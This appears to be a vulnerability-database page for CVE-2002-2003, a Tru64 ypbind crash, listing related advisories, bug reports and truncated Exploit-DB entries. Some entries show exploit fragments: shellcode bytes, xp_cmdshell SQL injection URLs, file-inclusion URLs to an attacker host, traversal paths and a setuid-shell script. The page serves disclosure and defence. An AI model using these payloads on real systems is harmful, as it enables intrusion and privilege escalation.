CVE-2002-2003
published 2002-12-31CVE-2002-2003: ypbind in Compaq Tru64 4.0F, 4.0G, 5.0A, 5.1 and 5.1A allows remote attackers to cause the process to core dump via certain network packets generated by nmap.
PriorityP417medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.19%
64.2th percentile
ypbind in Compaq Tru64 4.0F, 4.0G, 5.0A, 5.1 and 5.1A allows remote attackers to cause the process to core dump via certain network packets generated by nmap.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2qc3-c6vw-rhw6: ypbind in Compaq Tru64 4
ghsa_unreviewed·2022-04-30
CVE-2002-2003 [MEDIUM] GHSA-2qc3-c6vw-rhw6: ypbind in Compaq Tru64 4
ypbind in Compaq Tru64 4.0F, 4.0G, 5.0A, 5.1 and 5.1A allows remote attackers to cause the process to core dump via certain network packets generated by nmap.
Cisco
Cisco Secure Access Control Server for Windows Admin Buffer Overflow Vulnerability
vendor_cisco·2003-04-23
Cisco Secure Access Control Server for Windows Admin Buffer Overflow Vulnerability
Cisco Secure Access Control Server for Windows Admin Buffer Overflow Vulnerability
Cisco Secure ACS for Windows is vulnerable to a buffer overflow on the administration
service which runs on TCP port 2002. Exploitation of this vulnerability results
in a Denial of Service, and can potentially result in system administrator access.
Cisco is providing repaired software, and customers are recommended to install
patches or upgrade at their earliest opportunity. Workarounds can be implemented,
and consist of blocking external access to port 2002 on the ACS.
This issue is documented in Cisco Bug ID CSCea51366. This issue is also being
referenced in the Mitre CVE as CAN-2003-0210.
This advisory is available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-
Red Hat
security flaw
vendor_redhat·2003-03-29·CVSS 10.0
CVE-2003-0161 [CRITICAL] security flaw
security flaw
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Red Hat
security flaw
vendor_redhat·2003-03-19·CVSS 9.8
CVE-2003-0028 [CRITICAL] security flaw
security flaw
Integer overflow in the xdrmem_getbytes() function, and possibly other functions, of XDR (external data representation) libraries derived from SunRPC, including libnsl, libc, glibc, and dietlibc, allows remote attackers to execute arbitrary code via certain integer values in length fields, a different vulnerability than CVE-2002-0391.
Cisco
Heap Overflow in Solaris cachefs Daemon
vendor_cisco
CVE-2003-1063 Heap Overflow in Solaris cachefs Daemon
CVE-2003-1063: Heap Overflow in Solaris cachefs Daemon
This advisory describes a vulnerability that affects Cisco products and applications that are installed on the Solaris operating system, and is based on the vulnerability of an common service within the Solaris operating system, not due to a defect of the Cisco product or application. A vulnerability in the "cachefs" program was discovered that enables an attacker to execute arbitrary code under Solaris OS. This vulnerability was publicly announced in the CERT Advisory CA-2002-11. All Cisco products and applications that are installed on Solaris OS are considered vulnerable to the underlying operating system vulnerability, unless the workaround was applied. This vulnerability is described in
CWE: CWE-119, CWE-119
No detection rules found.
Exploit-DB
Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities
exploitdb·2010-02-24
CVE-2010-1114 Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities
Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities
---
| # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability
| # Author : indoushka
| # email : [email protected]
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html
| # Dork : All right reserved 2002-2003 (MSN/Web Server Creator)
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Multi
====================== Exploit By indoushka =================================
# Exploit :
1- Directory traversal (Windows)
http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
2- XSS
http://127.0.0.1/1082_webserve-01/index.php?pg=forum
3
Exploit-DB
Microsoft Office 2000/2002 - Property Code Execution
exploitdb·2006-07-11·CVSS 9.3
CVE-2006-2389 [CRITICAL] Microsoft Office 2000/2002 - Property Code Execution
Microsoft Office 2000/2002 - Property Code Execution
---
source: https://www.securityfocus.com/bid/18911/info
Microsoft Office is prone to a code-execution vulnerability. This is due to a failure to handle exceptional conditions.
Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users.
#Microsoft Office Property Code Execution exploit (CVE-2006-2389)
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Vulnerble application MS office 2003
#Tested on XP SP2 - MS Ofice 2003
#Greets Mila http://contagiodump.blogspot.com, Villy and ASL IT SECURITY TEAM
#!/usr/bin/python
import sys
import zl
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
Exploit-DB
Norton AntiVirus - Denial of Service
exploitdb·2004-07-12
CVE-2004-0683 Norton AntiVirus - Denial of Service
Norton AntiVirus - Denial of Service
---
Norton AntiVirus Denial Of Service Vulnerability
*vulnerable [...only tested on!]
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton AntiVirus 2002
*not vulnerable
Mcafee 7*
Mcafee 8*
Risk Impact: Medium
Remote: yes
Description:
While having a virus scan [automatic/manual] of some specially crafted compressed files; NAV triggers a DoS using 100% CPU for a very long time. Morover, NAV is unable to stop the scan in middle, even if the user wishes to manually stop the virus scan.
Then, in this situation the only alternate is to kill the process.
--- [Proof of Concept] ---
Please download this file.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec.
The
Exploit-DB
Symantec Multiple Firewall - DNS Response Denial of Service
exploitdb·2004-05-16
CVE-2004-0445 Symantec Multiple Firewall - DNS Response Denial of Service
Symantec Multiple Firewall - DNS Response Denial of Service
---
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discoveried by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Persona
Exploit-DB
OpenBSD - 'ibcs2_exec' Kernel Code Execution
exploitdb·2003-11-07
CVE-2003-0955 OpenBSD - 'ibcs2_exec' Kernel Code Execution
OpenBSD - 'ibcs2_exec' Kernel Code Execution
---
//
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
//
#include
#include
#include
#include
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
/*
* Copyright (c) 1994, 1995 Scott Bartram
* All rights reserved.
*
* adapted from sys/sys/exec_ecoff.h
* based on Intel iBCS2
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, t
Exploit-DB
Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow
exploitdb·2003-09-03
CVE-2003-0665 Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow
Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8536/info
Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer.
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
https://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */
#include
#include
#define Filename "
Exploit-DB
Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite
exploitdb·2003-08-02
CVE-2003-1310 Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite
Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite
---
source: https://www.securityfocus.com/bid/8329/info
It has been reported that a memory corruption vulnerability affects the Symantec Norton AntiVirus Device Driver. According to the report, one of the device control operation handlers attempts to write data to an address offset from a pointer parameter passed to DeviceIoControl(). There is no validation on the parameter supplied or the address written to. This vulnerability can be exploited by unprivileged userland programs to crash the affected host or potentially elevate privileges.
;------------------------[NAVAP_EXPLOIT.ASM]--------------------------------------
; NAVAP (Norton AntyVirus Device Driver Exploit)
; powered by Lord YuP / Sec-Labs ^ Tkt
; email: yu
Exploit-DB
IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow
exploitdb·2003-06-01
CVE-2002-0747 IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow
IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for A
Exploit-DB
Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow
exploitdb·2003-04-30
CVE-2003-0117 Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow
Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow
---
source: https://www.securityfocus.com/bid/7469/info
Microsoft BizTalk Server 2002 contains a boundary condition error that could allow a buffer to be overrun. Successful exploitation could allow arbitrary code execution in the security context of the IIS Server hosting the application.
It is important to note that the HTTP Receiver is an optional component and is not installed by default.
POST /Site/biztalkhttpreceive.dll?XXXX...(more than 250 chars) HTTP/1.0
Exploit-DB
Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection
exploitdb·2003-04-30
CVE-2003-0118 Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection
Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/7470/info
A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.
This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnD
Exploit-DB
Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection
exploitdb·2003-04-30
CVE-2003-0118 Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection
Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/7470/info
A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.
This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/RawCustomSearch
Exploit-DB
IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
exploitdb·2003-04-16
CVE-2002-1468 IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\x
Exploit-DB
Sendmail 8.12.x - Header Processing Buffer Overflow (1)
exploitdb·2003-03-02
CVE-2002-1337 Sendmail 8.12.x - Header Processing Buffer Overflow (1)
Sendmail 8.12.x - Header Processing Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/
/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c co
Exploit-DB
Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow
exploitdb·2003-02-20
CVE-2003-0100 Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow
Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow
---
// source: https://www.securityfocus.com/bid/6895/info
Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible.
/* Cisco IOS IO memory exploit prove of concept
* by FX of Phenoelit
* http://www.phenoelit.de
*
* For:
* 19C3 Chaos Communication Congress 2002 / Berlin
* BlackHat Briefings Seattle 2003
*
* Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
* Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
* str
Exploit-DB
HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)
exploitdb·2003-02-12
CVE-2003-1359 HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)
HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6836/info
A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option.
A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges.
All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable.
/*## copyright LAST STAGE OF DELIRIUM jun 2002 poland *://lsd-pl.net/ #*/
/*## /usr/bin/stmkfont #*/
#include
#include
#include
#define
Exploit-DB
HP-UX 10.x - rs.F3000 Unauthorized Access
exploitdb·2003-02-12
CVE-2003-1358 HP-UX 10.x - rs.F3000 Unauthorized Access
HP-UX 10.x - rs.F3000 Unauthorized Access
---
source: https://www.securityfocus.com/bid/6837/info
The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner.
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 2002 poland *://lsd-pl.net/ #
## /usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 #
echo "copyright LAST STAGE OF DELIRIUM may 2002 poland //lsd-pl.net/"
echo "/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 for HP-UX 10.20 700/800"
cat > /tmp/rm << 'EOF'
/usr/bin/cp /bin/sh /tmp/sh
/usr/bin/chown daemon /tmp/sh
/usr/bin/chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/rm
PATH=/tmp:$PATH
export PATH
Exploit-DB
N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion
exploitdb·2003-01-02
CVE-2003-1251 N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion
N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6500/info
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with :
http://[attacker]/common/lib/launch.inc.php
Exploit-DB
N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion
exploitdb·2003-01-02
CVE-2003-1251 N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion
N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion
---
source: https://www.securityfocus.com/bid/6500/info
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/rec
Exploit-DB
CUPS 1.1.x - Negative Length HTTP Header
exploitdb·2002-12-19
CVE-2002-1368 CUPS 1.1.x - Negative Length HTTP Header
CUPS 1.1.x - Negative Length HTTP Header
---
source: https://www.securityfocus.com/bid/6437/info
A vulnerability has been reported for CUPS that if exploited may result in a DoS or the execute of code on affected systems.
An attacker can exploit this vulnerability by connecting to a vulnerable system and issuing malformed HTTP headers with a negative value for some fields. When the cupsd service receives this request, it will crash.
This vulnerability is very similar to the issue described in BID 5033. It may be very likely that this vulnerability may be exploited to execute malicious attacker-supplied code on BSD, and possibly other, platforms.
*** January 05, 2003
There are reports of this vulnerability being actively exploited in the wild. Vulnerable users are advised to update i
Exploit-DB
HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun
exploitdb·2002-12-11
CVE-2003-0089 HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun
HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun
---
// source: https://www.securityfocus.com/bid/8986/info
HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M).
/*
Program : x_hpux_11i_sw.c
Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
Complie : cc x_hpux_11i_sw.c -o x_sw ;./x_sw ( not use gcc for some system)
Usage : ./x_sw [ off ]
Tested : HP-UX B11.11 & HP-UX B11.0
Author : watercloud [@] xfocus.org
Date : 2002-12-11
Note : Use as your own risk !!
*/
#include
#define T_LEN 2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"
Exploit-DB
Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
exploitdb·2002-12-10
CVE-2002-1349 Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
---
source: https://www.securityfocus.com/bid/6350/info
A buffer overflow vulnerability has been reported for PC-cillin's mail scanning utility.
An attacker can exploit this vulnerability by connecting to a vulnerable pop3trap.exe service and sending an overly long string. This will result in the process crashing and allowing the attacker to gain control over the execution of the process.
#!/usr/bin/perl
#pc-cillin DOS..will add shellcode l8r..
use IO::Socket;
$buf = 1100;
$host = $ARGV[0];
$port = $ARGV[1];
#shellcode needs to be modded..
#return addr is in the shellcode; doesn't work? go figure..
$hellcode = "\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE7\x77\x8B
Bugzilla
CVE-2003-0161 security flaw
bugzilla·2018-08-16·CVSS 10.0
CVE-2003-0161 [CRITICAL] CVE-2003-0161 security flaw
CVE-2003-0161 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Bugzilla
CVE-2003-0028 security flaw
bugzilla·2018-08-16·CVSS 9.8
CVE-2003-0028 [CRITICAL] CVE-2003-0028 security flaw
CVE-2003-0028 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Integer overflow in the xdrmem_getbytes() function, and possibly other functions, of XDR (external data representation) libraries derived from SunRPC, including libnsl, libc, glibc, and dietlibc, allows remote attackers to execute arbitrary code via certain integer values in length fields, a different vulnerability than CVE-2002-0391.
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CAN-2003-0977 fix pushed for RH9, but not FC1
bugzilla·2004-03-20
[MEDIUM] CAN-2003-0977 fix pushed for RH9, but not FC1
CAN-2003-0977 fix pushed for RH9, but not FC1
Description of problem:
CAN-2003-0977 fix pushed for RH9, but not FC1
Version-Release number of selected component (if applicable):
cvs-1.11.5-3
Additional info:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=111221#c5
https://rhn.redhat.com/errata/RHSA-2004-003.html
http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0081.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
Discussion:
A rebuild from cvs-1.11.11-1 (or higher) from Fedora Development
at Fedora Core 1 solves the problem, so maybe one of the Red Hat
maintainers could do that? Would be very nice :)
BTW: Maybe the kerberos 4 support has to be disabled.
---
Maybe that issue is fixed soon by one of
Bugzilla
CAN-2002-1565 Wget buffer overflow
bugzilla·2003-11-24
[MEDIUM] CAN-2002-1565 Wget buffer overflow
CAN-2002-1565 Wget buffer overflow
A buffer overflow in the url_filename function for wget 1.8.1 allows
attackers to cause a segmentation fault via a long URL. Red Hat does not
believe that this issue is exploitable to allow an attacker to be able
to run arbitrary code. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2002-1565 to this issue.
RHSA-2003:372 in progress
Discussion:
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2003-3
Bugzilla
SquirrelMail 1.2.8 vulnerable to XSS attacks
bugzilla·2002-12-06
[MEDIUM] SquirrelMail 1.2.8 vulnerable to XSS attacks
SquirrelMail 1.2.8 vulnerable to XSS attacks
An incomplete fix for a cross-site scripting (XSS) vulnerability in SquirrelMail
1.2.8 calls the strip_tags function on the PHP_SELF value but does not save the
result back to that variable, leaving it open to cross-site scripting attacks.
This bug has been designated CAN-2002-1276.
Discussion:
Isnt this a dup of 78982 ?
---
No (check the CVE's).
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2003-042.html
CWE
Failure to Handle Incomplete Element
mitre_cwe·CVSS 5.0
CVE-2002-1532 [MEDIUM] CWE-239 Failure to Handle Incomplete Element
CWE-239: Failure to Handle Incomplete Element
The product does not properly handle when a particular element is not completely specified.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity, Other. Impact: Varies by Context, Unexpected State.
Observed Examples:
CVE-2002-1532: HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it.
CVE-2003-0195: Partial request is not timed out.
CVE-2005-2526: MFV. CPU exhaustion in printer via partial printing request then early termination of connection.
CVE-2002-1906: CPU consumption by sending incomplete HTTP requests and leaving the connections open.
CWE
Behavioral Change in New Version or Environment
mitre_cwe·CVSS 2.1
CVE-2002-1976 [LOW] CWE-439 Behavioral Change in New Version or Environment
CWE-439: Behavioral Change in New Version or Environment
A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Common Consequences:
